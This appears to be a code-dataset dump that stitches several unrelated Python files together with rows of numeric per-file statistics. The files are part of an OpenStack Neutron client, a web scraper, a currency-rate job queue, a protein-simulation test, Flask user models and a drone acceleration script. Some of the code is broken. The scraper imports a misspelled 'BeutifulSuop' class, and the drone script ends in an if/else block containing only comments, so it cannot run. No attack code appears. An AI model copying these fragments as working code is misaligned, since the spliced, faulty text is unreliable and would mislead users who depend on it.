return self.delete(self.providernet_path % (providernet))
def list_providernet_ranges(self, retrieve_all=True, **_params):
"""Fetches a list of all provider network segmentation id ranges."""
# Pass filters in "params" argument to do_request
return self.list('providernet_ranges',
self.providernet_ranges_path, retrieve_all,
**_params)
def show_providernet_range(self, range, **_params):
"""Fetches information of a provider network segmentation range."""
return self.get(self.providernet_range_path % (range), params=_params)
def create_providernet_range(self, body=None):
"""Creates a new provider network segmentation id range."""
return self.post(self.providernet_ranges_path, body=body)
def update_providernet_range(self, range, body=None):
"""Updates a provider network segmentation id range."""
return self.put(self.providernet_range_path % (range), body=body)
def delete_providernet_range(self, range):
"""Deletes the specified provider network segmentation id range."""
return self.delete(self.providernet_range_path % (range))
def show_service_profile(self, flavor_profile, **_params):
"""Fetches information for a certain Neutron service flavor profile."""
return self.get(self.service_profile_path % (flavor_profile),
params=_params)
def update_service_profile(self, service_profile, body):
"""Update a Neutron service profile."""
return self.put(self.service_profile_path % (service_profile),
body=body)
def list_availability_zones(self, retrieve_all=True, **_params):
"""Fetches a list of all availability zones."""
return self.list('availability_zones', self.availability_zones_path,
retrieve_all, **_params)
@debtcollector.renames.renamed_kwarg(
'tenant_id', 'project_id', replace=True)
def get_auto_allocated_topology(self, project_id, **_params):
"""Fetch information about a project's auto-allocated topology."""
return self.get(
self.auto_allocated_topology_path % project_id,
params=_params)
@debtcollector.renames.renamed_kwarg(
'tenant_id', 'project_id', replace=True)
def delete_auto_allocated_topology(self, project_id, **_params):
"""Delete a project's auto-allocated topology."""
return self.delete(
self.auto_allocated_topology_path % project_id,
params=_params)
@debtcollector.renames.renamed_kwarg(
'tenant_id', 'project_id', replace=True)
def validate_auto_allocated_topology_requirements(self, project_id):
"""Validate requirements for getting an auto-allocated topology."""
return self.get_auto_allocated_topology(project_id, fields=['dry-run'])
def list_bgp_speakers(self, retrieve_all=True, **_params):
"""Fetches a list of all BGP speakers for a project."""
return self.list('bgp_speakers', self.bgp_speakers_path, retrieve_all,
**_params)
def show_bgp_speaker(self, bgp_speaker_id, **_params):
"""Fetches information of a certain BGP speaker."""
return self.get(self.bgp_speaker_path % (bgp_speaker_id),
params=_params)
def create_bgp_speaker(self, body=None):
"""Creates a new BGP speaker."""
return self.post(self.bgp_speakers_path, body=body)
def update_bgp_speaker(self, bgp_speaker_id, body=None):
"""Update a BGP speaker."""
return self.put(self.bgp_speaker_path % bgp_speaker_id, body=body)
def delete_bgp_speaker(self, speaker_id):
"""Deletes the specified BGP speaker."""
return self.delete(self.bgp_speaker_path % (speaker_id))
def add_peer_to_bgp_speaker(self, speaker_id, body=None):
"""Adds a peer to BGP speaker."""
return self.put((self.bgp_speaker_path % speaker_id) +
"/add_bgp_peer", body=body)
def remove_peer_from_bgp_speaker(self, speaker_id, body=None):
"""Removes a peer from BGP speaker."""
return self.put((self.bgp_speaker_path % speaker_id) +
"/remove_bgp_peer", body=body)
def add_network_to_bgp_speaker(self, speaker_id, body=None):
"""Adds a network to BGP speaker."""
return self.put((self.bgp_speaker_path % speaker_id) +
"/add_gateway_network", body=body)
def remove_network_from_bgp_speaker(self, speaker_id, body=None):
"""Removes a network from BGP speaker."""
return self.put((self.bgp_speaker_path % speaker_id) +
"/remove_gateway_network", body=body)
def add_vpn_to_bgp_speaker(self, speaker_id, body=None):
"""Adds a VPN to BGP speaker."""
return self.put((self.bgp_speaker_path % speaker_id) +
"/add_bgp_vpn", body=body)
def remove_vpn_from_bgp_speaker(self, speaker_id, body=None):
"""Removes a VPN from BGP speaker."""
return self.put((self.bgp_speaker_path % speaker_id) +
"/remove_bgp_vpn", body=body)
def list_route_advertised_from_bgp_speaker(self, speaker_id, **_params):
"""Fetches a list of all routes advertised by BGP speaker."""
return self.get((self.bgp_speaker_path % speaker_id) +
"/get_advertised_routes", params=_params)
def list_bgp_peers(self, **_params):
"""Fetches a list of all BGP peers."""
return self.get(self.bgp_peers_path, params=_params)
def show_bgp_peer(self, peer_id, **_params):
"""Fetches information of a certain BGP peer."""
return self.get(self.bgp_peer_path % peer_id,
params=_params)
def create_bgp_peer(self, body=None):
"""Create a new BGP peer."""
return self.post(self.bgp_peers_path, body=body)
def update_bgp_peer(self, bgp_peer_id, body=None):
"""Update a BGP peer."""
return self.put(self.bgp_peer_path % bgp_peer_id, body=body)
def delete_bgp_peer(self, peer_id):
"""Deletes the specified BGP peer."""
return self.delete(self.bgp_peer_path % peer_id)
def list_network_ip_availabilities(self, retrieve_all=True, **_params):
"""Fetches IP availability information for all networks"""
return self.list('network_ip_availabilities',
self.network_ip_availabilities_path,
retrieve_all, **_params)
def show_network_ip_availability(self, network, **_params):
"""Fetches IP availability information for a specified network"""
return self.get(self.network_ip_availability_path % (network),
params=_params)
def add_tag(self, resource_type, resource_id, tag, **_params):
"""Add a tag on the resource."""
return self.put(self.tag_path % (resource_type, resource_id, tag))
def replace_tag(self, resource_type, resource_id, body, **_params):
"""Replace tags on the resource."""
return self.put(self.tags_path % (resource_type, resource_id), body)
def remove_tag(self, resource_type, resource_id, tag, **_params):
"""Remove a tag on the resource."""
return self.delete(self.tag_path % (resource_type, resource_id, tag))
def remove_tag_all(self, resource_type, resource_id, **_params):
"""Remove all tags on the resource."""
return self.delete(self.tags_path % (resource_type, resource_id))
def create_trunk(self, body=None):
"""Create a trunk port."""
return self.post(self.trunks_path, body=body)
def update_trunk(self, trunk, body=None):
"""Update a trunk port."""
return self.put(self.trunk_path % trunk, body=body)
def delete_trunk(self, trunk):
"""Delete a trunk port."""
return self.delete(self.trunk_path % (trunk))
def list_trunks(self, retrieve_all=True, **_params):
"""Fetch a list of all trunk ports."""
return self.list('trunks', self.trunks_path, retrieve_all,
**_params)
def show_trunk(self, trunk, **_params):
"""Fetch information for a certain trunk port."""
return self.get(self.trunk_path % (trunk), params=_params)
def trunk_add_subports(self, trunk, body=None):
"""Add specified subports to the trunk."""
return self.put(self.subports_add_path % (trunk), body=body)
def trunk_remove_subports(self, trunk, body=None):
"""Removes specified subports from the trunk."""
return self.put(self.subports_remove_path % (trunk), body=body)
def trunk_get_subports(self, trunk, **_params):
"""Fetch a list of all subports attached to given trunk."""
return self.get(self.subports_path % (trunk), params=_params)
def list_bgpvpns(self, retrieve_all=True, **_params):
"""Fetches a list of all BGP VPNs for a project"""
return self.list('bgpvpns', self.bgpvpns_path, retrieve_all, **_params)
def show_bgpvpn(self, bgpvpn, **_params):
"""Fetches information of a certain BGP VPN"""
return self.get(self.bgpvpn_path % bgpvpn, params=_params)
def create_bgpvpn(self, body=None):
"""Creates a new BGP VPN"""
return self.post(self.bgpvpns_path, body=body)
def update_bgpvpn(self, bgpvpn, body=None):
"""Updates a BGP VPN"""
return self.put(self.bgpvpn_path % bgpvpn, body=body)
def delete_bgpvpn(self, bgpvpn):
"""Deletes the specified BGP VPN"""
return self.delete(self.bgpvpn_path % bgpvpn)
def list_bgpvpn_network_assocs(self, bgpvpn, retrieve_all=True, **_params):
"""Fetches a list of network associations for a given BGP VPN."""
return self.list('network_associations',
self.bgpvpn_network_associations_path % bgpvpn,
retrieve_all, **_params)
def show_bgpvpn_network_assoc(self, bgpvpn, net_assoc, **_params):
"""Fetches information of a certain BGP VPN's network association"""
return self.get(
self.bgpvpn_network_association_path % (bgpvpn, net_assoc),
params=_params)
def create_bgpvpn_network_assoc(self, bgpvpn, body=None):
"""Creates a new BGP VPN network association"""
return self.post(self.bgpvpn_network_associations_path % bgpvpn,
body=body)
def update_bgpvpn_network_assoc(self, bgpvpn, net_assoc, body=None):
"""Updates a BGP VPN network association"""
return self.put(
self.bgpvpn_network_association_path % (bgpvpn, net_assoc),
body=body)
def delete_bgpvpn_network_assoc(self, bgpvpn, net_assoc):
"""Deletes the specified BGP VPN network association"""
return self.delete(
self.bgpvpn_network_association_path % (bgpvpn, net_assoc))
def list_bgpvpn_router_assocs(self, bgpvpn, retrieve_all=True, **_params):
"""Fetches a list of router associations for a given BGP VPN."""
return self.list('router_associations',
self.bgpvpn_router_associations_path % bgpvpn,
retrieve_all, **_params)
def show_bgpvpn_router_assoc(self, bgpvpn, router_assoc, **_params):
"""Fetches information of a certain BGP VPN's router association"""
return self.get(
self.bgpvpn_router_association_path % (bgpvpn, router_assoc),
params=_params)
def create_bgpvpn_router_assoc(self, bgpvpn, body=None):
"""Creates a new BGP VPN router association"""
return self.post(self.bgpvpn_router_associations_path % bgpvpn,
body=body)
def update_bgpvpn_router_assoc(self, bgpvpn, router_assoc, body=None):
"""Updates a BGP VPN router association"""
return self.put(
self.bgpvpn_router_association_path % (bgpvpn, router_assoc),
body=body)
def delete_bgpvpn_router_assoc(self, bgpvpn, router_assoc):
"""Deletes the specified BGP VPN router association"""
return self.delete(
self.bgpvpn_router_association_path % (bgpvpn, router_assoc))
def create_sfc_port_pair(self, body=None):
"""Creates a new Port Pair."""
return self.post(self.sfc_port_pairs_path, body=body)
def update_sfc_port_pair(self, port_pair, body=None):
"""Update a Port Pair."""
return self.put(self.sfc_port_pair_path % port_pair, body=body)
def delete_sfc_port_pair(self, port_pair):
"""Deletes the specified Port Pair."""
return self.delete(self.sfc_port_pair_path % (port_pair))
def list_sfc_port_pairs(self, retrieve_all=True, **_params):
"""Fetches a list of all Port Pairs."""
return self.list('port_pairs', self.sfc_port_pairs_path, retrieve_all,
**_params)
def show_sfc_port_pair(self, port_pair, **_params):
"""Fetches information of a certain Port Pair."""
return self.get(self.sfc_port_pair_path % (port_pair), params=_params)
def create_sfc_port_pair_group(self, body=None):
"""Creates a new Port Pair Group."""
return self.post(self.sfc_port_pair_groups_path, body=body)
def update_sfc_port_pair_group(self, port_pair_group, body=None):
"""Update a Port Pair Group."""
return self.put(self.sfc_port_pair_group_path % port_pair_group,
body=body)
def delete_sfc_port_pair_group(self, port_pair_group):
"""Deletes the specified Port Pair Group."""
return self.delete(self.sfc_port_pair_group_path % (port_pair_group))
def list_sfc_port_pair_groups(self, retrieve_all=True, **_params):
"""Fetches a list of all Port Pair Groups."""
return self.list('port_pair_groups', self.sfc_port_pair_groups_path,
retrieve_all, **_params)
def show_sfc_port_pair_group(self, port_pair_group, **_params):
"""Fetches information of a certain Port Pair Group."""
return self.get(self.sfc_port_pair_group_path % (port_pair_group),
params=_params)
def create_sfc_port_chain(self, body=None):
"""Creates a new Port Chain."""
return self.post(self.sfc_port_chains_path, body=body)
def update_sfc_port_chain(self, port_chain, body=None):
"""Update a Port Chain."""
return self.put(self.sfc_port_chain_path % port_chain, body=body)
def delete_sfc_port_chain(self, port_chain):
"""Deletes the specified Port Chain."""
return self.delete(self.sfc_port_chain_path % (port_chain))
def list_sfc_port_chains(self, retrieve_all=True, **_params):
"""Fetches a list of all Port Chains."""
return self.list('port_chains', self.sfc_port_chains_path,
retrieve_all, **_params)
def show_sfc_port_chain(self, port_chain, **_params):
"""Fetches information of a certain Port Chain."""
return self.get(self.sfc_port_chain_path % (port_chain),
params=_params)
def create_sfc_flow_classifier(self, body=None):
"""Creates a new Flow Classifier."""
return self.post(self.sfc_flow_classifiers_path, body=body)
def update_sfc_flow_classifier(self, flow_classifier, body=None):
"""Update a Flow Classifier."""
return self.put(self.sfc_flow_classifier_path % flow_classifier,
body=body)
def delete_sfc_flow_classifier(self, flow_classifier):
"""Deletes the specified Flow Classifier."""
return self.delete(self.sfc_flow_classifier_path % (flow_classifier))
def list_sfc_flow_classifiers(self, retrieve_all=True, **_params):
"""Fetches a list of all Flow Classifiers."""
return self.list('flow_classifiers', self.sfc_flow_classifiers_path,
retrieve_all, **_params)
def show_sfc_flow_classifier(self, flow_classifier, **_params):
"""Fetches information of a certain Flow Classifier."""
return self.get(self.sfc_flow_classifier_path % (flow_classifier),
params=_params)
def delete_qos(self, qos):
return self.delete(self.qoses_path % (qos))
def create_qos(self, body=None):
return self.post(self.qos_path, body=body)
def list_qoses(self, retrieve_all=True, **_params):
return self.list('qoses', self.qos_path, retrieve_all, **_params)
def show_qos(self, qos, **_params):
return self.get(self.qoses_path % (qos), params=_params)
def update_qos(self, qos, body=None):
return self.put(self.qoses_path % (qos), body=body)
def delete_portforwarding(self, portforwarding_id):
return self.delete(self.portforwarding_path % (portforwarding_id))
def create_portforwarding(self, body=None):
return self.post(self.portforwardings_path, body=body)
def list_portforwardings(self, retrieve_all=True, **_params):
return self.list('portforwardings', self.portforwardings_path,
retrieve_all, **_params)
def show_portforwarding(self, portforwarding_id, **_params):
return self.get(self.portforwarding_path % (portforwarding_id),
params=_params)
def update_portforwarding(self, portforwarding_id, body=None):
return self.put(self.portforwarding_path % (portforwarding_id),
body=body)
def list_providernet_connectivity_tests(self, **_params):
"""Lists all connectivity tests"""
return self.list('providernet_connectivity_tests',
self.providernet_connectivity_tests_path, True,
**_params)
def create_providernet_connectivity_test(self, body=None):
"""Schedules connectivity tests"""
return self.post(self.providernet_connectivity_tests_path, body=body)
def __init__(self, **kwargs):
"""Initialize a new client for the Neutron v2.0 API."""
super(Client, self).__init__(**kwargs)
self._register_extensions(self.version)
def extend_show(self, resource_singular, path, parent_resource):
def _fx(obj, **_params):
return self.show_ext(path, obj, **_params)
def _parent_fx(obj, parent_id, **_params):
return self.show_ext(path % parent_id, obj, **_params)
fn = _fx if not parent_resource else _parent_fx
setattr(self, "show_%s" % resource_singular, fn)
def extend_list(self, resource_plural, path, parent_resource):
def _fx(retrieve_all=True, **_params):
return self.list_ext(resource_plural, path,
retrieve_all, **_params)
def _parent_fx(parent_id, retrieve_all=True, **_params):
return self.list_ext(resource_plural, path % parent_id,
retrieve_all, **_params)
fn = _fx if not parent_resource else _parent_fx
setattr(self, "list_%s" % resource_plural, fn)
def extend_create(self, resource_singular, path, parent_resource):
def _fx(body=None):
return self.create_ext(path, body)
def _parent_fx(parent_id, body=None):
return self.create_ext(path % parent_id, body)
fn = _fx if not parent_resource else _parent_fx
setattr(self, "create_%s" % resource_singular, fn)
def extend_delete(self, resource_singular, path, parent_resource):
def _fx(obj):
return self.delete_ext(path, obj)
def _parent_fx(obj, parent_id):
return self.delete_ext(path % parent_id, obj)
fn = _fx if not parent_resource else _parent_fx
setattr(self, "delete_%s" % resource_singular, fn)
def extend_update(self, resource_singular, path, parent_resource):
def _fx(obj, body=None):
return self.update_ext(path, obj, body)
def _parent_fx(obj, parent_id, body=None):
return self.update_ext(path % parent_id, obj, body)
fn = _fx if not parent_resource else _parent_fx
setattr(self, "update_%s" % resource_singular, fn)
def _extend_client_with_module(self, module, version):
classes = inspect.getmembers(module, inspect.isclass)
for cls_name, cls in classes:
if hasattr(cls, 'versions'):
if version not in cls.versions:
continue
parent_resource = getattr(cls, 'parent_resource', None)
if issubclass(cls, client_extension.ClientExtensionList):
self.extend_list(cls.resource_plural, cls.object_path,
parent_resource)
elif issubclass(cls, client_extension.ClientExtensionCreate):
self.extend_create(cls.resource, cls.object_path,
parent_resource)
elif issubclass(cls, client_extension.ClientExtensionUpdate):
self.extend_update(cls.resource, cls.resource_path,
parent_resource)
elif issubclass(cls, client_extension.ClientExtensionDelete):
self.extend_delete(cls.resource, cls.resource_path,
parent_resource)
elif issubclass(cls, client_extension.ClientExtensionShow):
self.extend_show(cls.resource, cls.resource_path,
parent_resource)
elif issubclass(cls, client_extension.NeutronClientExtension):
setattr(self, "%s_path" % cls.resource_plural,
cls.object_path)
setattr(self, "%s_path" % cls.resource, cls.resource_path)
self.EXTED_PLURALS.update({cls.resource_plural: cls.resource})
def _register_extensions(self, version):
for name, module in itertools.chain(
client_extension._discover_via_entry_points()):
self._extend_client_with_module(module, version)
| 43.804168 | 79 | 0.64244 | 13,299 | 111,394 | 5.122641 | 0.050981 | 0.057687 | 0.022928 | 0.023207 | 0.606288 | 0.45934 | 0.322828 | 0.247248 | 0.192217 | 0.160012 | 0 | 0.001734 | 0.254502 | 111,394 | 2,542 | 80 | 43.8214 | 0.818626 | 0.187999 | 0 | 0.177665 | 0 | 0 | 0.076473 | 0.026635 | 0 | 0 | 0 | 0.000393 | 0 | 1 | 0.268401 | false | 0.001269 | 0.010152 | 0.019036 | 0.649112 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
e038cf7838859e97a7c49b8c8348340926ae0c00 | 490 | py | Python | src/scrapping-django/web-scrapping.py | jonathanccardoso/work-exercises | d978520d7002a906016512934c4e355759a31882 | [
"MIT"
] | null | null | null | src/scrapping-django/web-scrapping.py | jonathanccardoso/work-exercises | d978520d7002a906016512934c4e355759a31882 | [
"MIT"
] | 5 | 2021-03-19T03:29:41.000Z | 2021-09-22T19:02:58.000Z | src/scrapping-django/web-scrapping.py | jonathanccardoso/work-exercises | d978520d7002a906016512934c4e355759a31882 | [
"MIT"
] | null | null | null | import requests
from bs4 import BeutifulSuop
import urllib.request
link = ""
ptc = requests.get(link)
html = ptc.content
sp = BeutifulSuop(html, "html.parser")
for img in sp.find_all('img'):
print(img.get("src"))
'''
https://cidades.ibge.gov.br/brasil/rn/natal/panorama
'''
'''
print(ptc) tempo de resposta
print(html) todo conteudo html do site
print(sp) somente o contudo html do site
i = sp.find_all('link') mostra todo os links ou qualquer marcação que desejar
print(i)
''' | 19.6 | 78 | 0.716327 | 78 | 490 | 4.474359 | 0.628205 | 0.034384 | 0.051576 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002398 | 0.14898 | 490 | 25 | 79 | 19.6 | 0.834532 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 0 | 0 | 0 | 0 | 0.08 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
e0452c4fee6fa1a0cb2f548b0611ad18e24f8a20 | 644 | py | Python | rq_test.py | VladimirFilonov/graphql-shop-example | 7f95b904ac29ed96ee1ad6692729359ca29ce40b | [
"MIT"
] | 1 | 2020-07-07T09:39:16.000Z | 2020-07-07T09:39:16.000Z | rq_test.py | VladimirFilonov/graphql-shop-example | 7f95b904ac29ed96ee1ad6692729359ca29ce40b | [
"MIT"
] | 9 | 2019-12-04T23:07:42.000Z | 2022-02-10T09:46:29.000Z | rq_test.py | VladimirFilonov/graphql-shop-example | 7f95b904ac29ed96ee1ad6692729359ca29ce40b | [
"MIT"
] | 4 | 2019-06-10T11:57:34.000Z | 2020-07-07T04:11:38.000Z | # https://www.freeforexapi.com/api/live?pairs=USDRUB
import requests
from redis import Redis
from rq import Queue
from rq.decorators import job
from rq_scheduler import Scheduler
from datetime import datetime, timedelta
redis_conn = Redis()
@job("default", connection=redis_conn)
def get_currency_rate(currency):
pair = "{}RUB".format(currency)
response = requests.get(
"https://www.freeforexapi.com/api/live?pairs={}".format(pair)
)
data = response.json()
return data['rates'][pair]['rate']
#sheduler = Scheduler(connection=redis_conn)
#sheduler.enqueue_at(datetime(2019, 7, 4, 21, 7), get_currency_rate, 'USD') | 30.666667 | 75 | 0.732919 | 88 | 644 | 5.261364 | 0.477273 | 0.038877 | 0.086393 | 0.099352 | 0.151188 | 0.151188 | 0.151188 | 0 | 0 | 0 | 0 | 0.016129 | 0.13354 | 644 | 21 | 75 | 30.666667 | 0.81362 | 0.259317 | 0 | 0 | 0 | 0 | 0.14135 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.4 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
e0497bd328b4b233edbd26ffdf8f636919fdfcdf | 1,395 | py | Python | fahmunge/tests/test_fah.py | choderalab/FAHMunge | ff8cb4eb26b79fd6e3fd1e466869c71322faa6b5 | [
"MIT"
] | 1 | 2020-06-05T16:46:52.000Z | 2020-06-05T16:46:52.000Z | fahmunge/tests/test_fah.py | choderalab/fahmunge | ff8cb4eb26b79fd6e3fd1e466869c71322faa6b5 | [
"MIT"
] | 21 | 2016-04-21T01:28:06.000Z | 2019-01-23T22:00:17.000Z | fahmunge/tests/test_fah.py | choderalab/FAHMunge | ff8cb4eb26b79fd6e3fd1e466869c71322faa6b5 | [
"MIT"
] | 4 | 2015-08-06T18:15:26.000Z | 2016-04-04T04:58:56.000Z | from __future__ import print_function
import mdtraj as md
import pytest
import os
import shutil
import tarfile
import tempfile
from fahmunge import fah
# TODO: Add unit tests for components of the code.
def test_dummy():
"""Dummy test to ensure py.test doesn't exist with error code 5."""
pass
def deprecated_test_fah_core17_1():
from mdtraj.utils import six
from mdtraj.testing import get_fn, eq
filename = get_fn('frame0.xtc')
tempdir = tempfile.mkdtemp()
tar_filename = os.path.join(tempdir, "results-000.tar.bz2")
archive = tarfile.open(tar_filename, mode='w:bz2')
tar = tarfile.open(tar_filename, "w:bz2")
tar.add(filename, arcname="positions.xtc")
tar.close()
shutil.copy(tar_filename, os.path.join(tempdir, "results-001.tar.bz2"))
trj0 = md.load(get_fn("frame0.xtc"), top=get_fn("frame0.h5"))
output_filename = os.path.join(tempdir, "traj.h5")
fah.concatenate_core17(tempdir, trj0, output_filename)
trj = md.load(output_filename)
eq(trj.n_atoms, trj0.n_atoms)
eq(trj.n_frames, trj0.n_frames * 2)
shutil.copy(tar_filename, os.path.join(tempdir, "results-002.tar.bz2"))
fah.concatenate_core17(tempdir, trj0, output_filename)
# Should notice the new file and append it to the HDF file.
trj = md.load(output_filename)
eq(trj.n_atoms, trj0.n_atoms)
eq(trj.n_frames, trj0.n_frames * 3)
| 29.0625 | 75 | 0.711828 | 218 | 1,395 | 4.399083 | 0.40367 | 0.057351 | 0.058394 | 0.075078 | 0.38999 | 0.363921 | 0.363921 | 0.233577 | 0.233577 | 0.139729 | 0 | 0.031088 | 0.169892 | 1,395 | 47 | 76 | 29.680851 | 0.797064 | 0.121147 | 0 | 0.1875 | 0 | 0 | 0.09516 | 0 | 0 | 0 | 0 | 0.021277 | 0 | 1 | 0.0625 | false | 0.03125 | 0.3125 | 0 | 0.375 | 0.03125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
e05677544ea6c92a2a98ecfed9b277033a0afb81 | 5,117 | py | Python | venv/microblog legacy/microblog-0.13/app/models.py | josueisonfire/CBBAS_git | bf3516b2d9471b4b22194d5dd669a2e2ca27f4ac | [
"MIT"
] | null | null | null | venv/microblog legacy/microblog-0.13/app/models.py | josueisonfire/CBBAS_git | bf3516b2d9471b4b22194d5dd669a2e2ca27f4ac | [
"MIT"
] | null | null | null | venv/microblog legacy/microblog-0.13/app/models.py | josueisonfire/CBBAS_git | bf3516b2d9471b4b22194d5dd669a2e2ca27f4ac | [
"MIT"
] | null | null | null | from datetime import datetime
from hashlib import md5
from time import time
from flask_login import UserMixin
from werkzeug.security import generate_password_hash, check_password_hash
from json import *
import jwt
from app import app, db, login
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(120), index=True, unique=True)
password_hash = db.Column(db.String(128))
# posts = db.relationship('Post', backref='author', lazy='dynamic')
about_me = db.Column(db.String(140))
last_seen = db.Column(db.DateTime, default=datetime.utcnow)
authenticated = db.Column(db.Boolean, default=False, nullable=False)
# followed = db.relationship(
# 'User', secondary=followers,
# primaryjoin=(followers.c.follower_id == id),
# secondaryjoin=(followers.c.followed_id == id),
# backref=db.backref('followers', lazy='dynamic'), lazy='dynamic')
def __repr__(self):
return '<User {}>'.format(self.username)
def set_password(self, password):
self.password_hash = generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.password_hash, password)
def avatar(self, size):
digest = md5(self.email.lower().encode('utf-8')).hexdigest()
return 'https://www.gravatar.com/avatar/{}?d=identicon&s={}'.format(
digest, size)
def get_reset_password_token(self, expires_in=600):
return jwt.encode(
{'reset_password': self.id, 'exp': time() + expires_in},
app.config['SECRET_KEY'], algorithm='HS256').decode('utf-8')
#to authenticae users.
# acc confirmation expires in 7 days.
# -- must add additional function to send another authentication email.
def generate_account_confirmation_token(self, expires_in=10080):
return jwt.encode({'auth_req': self.id, 'exp': time() + expires_in}, app.config['SECRET_KEY'], algorithm='HS256').decode('utf-8')
@staticmethod
def verify_reset_password_token(token):
try:
id = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256'])['reset_password']
except:
return
return User.query.get(id)
@staticmethod
def verify_account_confirmation_token(token):
try:
id = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256'])['auth_req']
except:
return None
return User.query.get(id)
@login.user_loader
def load_user(id):
return User.query.get(int(id))
# class Post(db.Model):
# id = db.Column(db.Integer, primary_key=True)
# body = db.Column(db.String(140))
# timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
# user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
# def __repr__(self):
# return '<Post {}>'.format(self.body)
'''
Classroom Model for the CBBAS.
Fields:
id: Class ID used to list class models within the database. Primary Key.
instructor: Instructor that runs the class. Initially, will be a one-to-one relationship.
start_date: Start Date of the class.
end_date: end date of the class.
curr_week: The current week fo the class.
attendance: Attendance data. Will be stored in a one-to-many relationship.
class_day_time: the day & time the class is run. one-to-one relationship. Will be implemented in the future.
The initiation form should contain the following information:
The implicit data that is already available are: {Instructor}
Class Name
Class Start Date
Class End Date
Classroom Schedule. {DAYS(multiple), {Start time, End time}}
// meaning: classroom schedule can have multiple days a week in which it runs, and the form must adjust according to the requirements. Each day must have a start and end time, which must also be filled subsequently.
The data editing forms shoudl contain the following imformation:
FORM: ADD STUDENT
<> Student Name (First, Last)
<> Student SBUID
FORM: DELETE STUDENT
<> Student SBUID
FORM: Edit Attendance:
(TBD) -- according to database logic.
'''
class Classroom(db.Model):
id = db.Column(db.Integer, primary_key=True)
start_date = db.Column(db.DateTime)
end_date = db.Column(db.DateTime)
current_week = db.Column(db.Integer)
class_name = db.Column(db.String(70))
# relationships
# instructor: 1:1
# attendance: 1:N
# class_day_time: 1:1
# <?> sudent_list
def __repr__(self):
return '<Class {}>'.format(self.class_name)
'''
Student Model for the CBBAS
'''
class Student(db.Model):
id = db.Column(db.Integer, primary_key=True)
sbuid = db.Column(db.Integer, index=True, unique=True)
first_name = db.Column(db.String(50))
last_name = db.Column(db.String(50))
#relationships
# class_id
# USER
class Instructor(db.Model):
id = db.Column(db.Integer, primary_key=True)
email = db.Column(db.String(120), index=True, unique=True)
password_hash = db.Column(db.String(128)) | 31.20122 | 219 | 0.686144 | 706 | 5,117 | 4.86119 | 0.287535 | 0.053613 | 0.067016 | 0.04662 | 0.235723 | 0.188811 | 0.175991 | 0.175991 | 0.175991 | 0.175991 | 0 | 0.013805 | 0.193082 | 5,117 | 164 | 220 | 31.20122 | 0.817389 | 0.165722 | 0 | 0.272727 | 1 | 0 | 0.065152 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.151515 | false | 0.166667 | 0.121212 | 0.090909 | 0.772727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
e0765c82a0fa15c9ed76d3d4114a37dcee7c4499 | 1,035 | py | Python | mavfleetcontrol/actions/accel.py | julianblanco/MAVFleetControl | 70ca504288e7123a906150beb8f1fc7141a18fbd | [
"CC0-1.0"
] | 5 | 2020-06-11T16:56:30.000Z | 2020-09-17T23:06:12.000Z | mavfleetcontrol/actions/accel.py | julianblanco/MAVFleetControl | 70ca504288e7123a906150beb8f1fc7141a18fbd | [
"CC0-1.0"
] | null | null | null | mavfleetcontrol/actions/accel.py | julianblanco/MAVFleetControl | 70ca504288e7123a906150beb8f1fc7141a18fbd | [
"CC0-1.0"
] | 4 | 2020-06-19T20:07:04.000Z | 2020-11-12T23:44:21.000Z | from mavfleetcontrol.craft import Craft
from mavsdk import System
from mavsdk.offboard import OffboardError, Attitude, AttitudeRate, PositionNedYaw
import numpy as np
import asyncio
class Accel:
# def __init__(self):
async def __call__(self, drone):
await drone.arm(coordinate=[0.0, 0.0, 0.0], attitude=[0.0, 0.0, 0.0])
await drone.start_offboard()
# schedule to get
# acceleration_frd (AccelerationFrd) – Acceleration
# angular_velocity_frd (AngularVelocityFrd) – Angular velocity
# magnetic_field_frd (MagneticFieldFrd) – Magnetic field
# temperature_degc (float) – Temperature
drone.imu = None
await drone.register_sensor("imu", drone.conn.telemetry.imu())
print("-- Starting Flip")
# set aircraft to flip at 300 deg/s to the right (roll)
while True:
if drone.imu is not None:
# print(drone.imu.acceleration_frd)
else:
# print("i tried :(")
await asyncio.sleep(0)
